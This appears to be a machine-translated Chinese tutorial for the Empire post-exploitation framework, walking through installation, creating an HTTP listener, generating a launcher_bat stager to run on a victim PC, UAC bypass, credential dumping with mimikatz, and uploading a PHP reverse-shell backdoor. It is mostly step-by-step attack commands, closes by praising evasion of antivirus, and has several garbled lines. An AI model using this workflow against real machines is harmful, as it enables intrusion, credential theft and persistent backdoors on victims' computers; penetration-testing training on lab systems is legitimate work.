安装
您可以从此处下载Empire 。从为GitHub提供的超链接中克隆命令,或者直接使用google。
使用以下命令下载它:
1
git clone https://github.com/EmpireProject/Empire.git
启动并完成下载后,请按照下面直接给出的步骤进行安装:
cd Empire/
ls
cd setup/
ls
./install.sh
等待它完成安装。这可能需要几秒钟。它将提示您输入密码。
就我而言,我的密码是toor。
安装完成后,移回目录并使用./empire运行empire 。
现在使用“ 帮助”命令,因为它打开了最初需要的所有基本选项。
根据工作流程,首先,我们必须在本地计算机上创建一个侦听器。键入以下命令:
listeners
运行上面的命令后,它将说“当前没有侦听器处于活动状态”,但是不用担心,我们现在进入侦听器界面。因此,在此侦听器界面中,输入:
uselistener <tab> <tab>
上面的命令将列出一个人可以使用的所有侦听器,例如dbx,http,http_com等。最受欢迎和最常用的侦听器是http,我们将在实践中使用相同的侦听器。对于该类型:
uselistener http
此命令会在本地端口80上创建一个侦听器。如果Apache之类的服务已经在端口80上忙了,请确保停止该服务,因为此HTTP侦听器仅在端口80上起作用。现在查看所有设置您应该提供以下侦听器类型:
info
正如您在图像中看到的,可以使用多种设置来修改或自定义侦听器。让我们尝试更改监听器的名称,因为它有助于记住所有已激活的监听器。如果批量激活。因此,请输入:
set Name test
上面的命令会将侦听器的名称从http更改为test。
通常,此侦听器会自动占用本地主机IP,但是以防万一,您可以使用以下命令来设置IP:
set Host //192.168.1.107
execute
上面的命令将执行监听器。然后返回并使用PowerShell监听器,如图所示。
现在键入“ back”从侦听器界面返回,以便我们可以执行模块。使用以下命令查看帝国提供的所有模块:
usestager <tabt> <tab>
如下图所示,有许多用于Windows和IOS的模块,以及可以在任何平台上使用的多个模块。在我们的教程中,我们将使用launcher_bat创建恶意软件并利用受害者的PC。对于这种类型:
usestager windows/launcher_bat
然后再次键入“ info”以查看漏洞利用程序所需的所有设置。检查后,您将看到我们仅需要提供侦听器。因此,键入:
set Listener test
execute
设置侦听器测试并创建/tmp/launcher.bat之后,以上两个命令将执行我们的利用。使用python服务器在受害者的PC中执行此文件。文件执行后,您将拥有一个会话。要检查您的会话类型:
agents
使用以上命令,您可以看到已激活会话。您可以更改会话的名称,因为默认情况下提供的名称非常复杂且难以记住。为此,请输入:
rename ZAF3GT5W raajpc
使用以下内容访问会话:
interact raajpc
获得对会话的访问权限后,请尝试使用以下命令来获取管理会话:
旁路http
执行bypassuac命令后,将打开另一个会话。通过输入以下命令重命名该会话:
rename HE3K45LN adminraj
让我们
interact with adminraj now.
interact adminraj
<tab> <tab>帮助我们查看Shell中的所有选项。有几个选项对于后期开发非常有帮助。如图所示,例如信息,工作,列表等。
信息: 有关IP,随机数,抖动,完整性等所有基本信息。
现在,如果您使用“帮助”命令,您将能够看到所有可执行命令。
让我们尝试运行 mimikatz 来获取用户的密码。由于 mimikatz 不能在普通的来宾用户shell上运行,而只能在admin shell上运行;这也证明我们必须获得管理员访问权限才能使用mimikatz。
嗯!用户raj的密码为“ 123”。
信誉
上面的命令将以明文和哈希值的形式转储任何用户的凭据或密码。
另一个重要的命令是 shell 命令。
要使用受害者的外壳运行正确的Microsoft Windows命令,我们使用此功能。
例如:一个这样的窗口的仅cmd命令是 netstat
shell netstat -ano
正如预期的那样,以上命令向我们显示了机器上当前正在使用的所有端口!
现在,由于Windows中的默认shell目录为“ C:/ windows / system32 ”;让我们尝试移至另一个目录并尝试从该目录下载一些文件,并且我们可以在该位置上载一些内容,例如,我们可以上载后门!现在,使用以下命令:
shell cd C:Users ajDesktop
shell dir
download 6.png
上面的命令将从窗口桌面将名为6.png的图像下载到“ Empires的下载目录”
upload /root/Desktop/revshell.php
在这里,我们可以上传任何后门,借助上述命令,我们可以从Kali的桌面向受害人的桌面上传php后门,并且由于我们具有shell访问权限,因此甚至可以调用此文件!
这是下载的文件所在的位置:
帝国目录/下载/ <代理名称> / <代理外壳位置>
shell dir
上面的命令证明我们确实已经上传了revshell.php
在那里!受害机器的桌面上的Revshell.php是我们的后门文件。
先前显示的是帝国的基本演示及其使用的不同术语以及如何使用它们。也有另一个术语,即usemodule。最后,让我们看看如何使用它。
usemodule <tab> <tab>
该命令将向您显示所有可用并准备使用的模块,如下图所示:
以下是有关如何使用usemodule的小演示。类型:
usemodule trollsploit/message
set MsgText you have been hacked
execute
y
使用以上模块将在受害者的PC上显示一条消息,如下图所示:
结论
.exe / dll / hta等形式的恶意软件使攻击者可以构造任何期望的攻击,因为此框架可以访问Win32。尽管反病毒公司正日益意识到这一点,但它们仍然有效。由于其大量,真实和有效的漏洞利用后收集,它是一个很好的工具。最终,目标是在攻击中未被发现并成功,并且此工具使我们能够做到这一点。本文涵盖了您需要了解的有关该框架的所有基础知识。